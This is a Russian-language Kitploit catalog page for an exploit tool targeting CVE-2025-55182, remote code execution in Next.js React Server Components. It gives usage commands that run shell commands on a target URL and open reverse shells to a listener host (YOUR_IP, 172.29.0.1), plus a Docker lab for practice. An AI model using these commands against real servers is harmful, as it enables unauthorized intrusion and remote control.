Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Эксплойт для CVE-2025-55182, обеспечивающий удалённое выполнение кода через загрязнение прототипа в React Server Components среды Next.js, с возможностями выполнения команд и получения обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/mr-destroyer/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной НагрузкиЛаборатории и Практика
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

Эксплойт для CVE-2025-55182, обеспечивающий удалённое выполнение кода через загрязнение прототипа в React Server Components среды Next.js, с возможностями выполнения команд и получения обратной оболочки.

Репозиторий
521 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт RCE для React Server Components в Next.js

Эксплуатирует CVE-2025-55182 для удалённого выполнения кода через загрязнение прототипа.

Установка

root@kitploit:~
uv sync

Использование

Выполнение команд

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Реверс-шелл

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Параметры

  • -u, --url: URL/хост для проверки (обязательно)
  • -c, --cmd: Команда для выполнения
  • -r, --reverse: Включить режим реверс-шелла
  • -l, --lhost: Хост прослушивания для реверс-шелла
  • -p, --lport: Порт прослушивания для реверс-шелла
  • -P, --payload: Тип полезной нагрузки реверс-шелла: nc, nc-mkfifo, sh, perl (по умолчанию: nc)
  • --timeout: Таймаут запроса в секундах (по умолчанию: 10)
  • Примеры

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    Лабораторная среда

    Каталог lab/ содержит полную Docker-среду для тестирования эксплойта.

    Настройка

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    Это запустит два сервиса:

    • vulnerable: Уязвимое приложение Next.js на порту 3011
    • patched: Исправленное приложение Next.js на порту 3012

    Тестирование

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    Скачать инструмент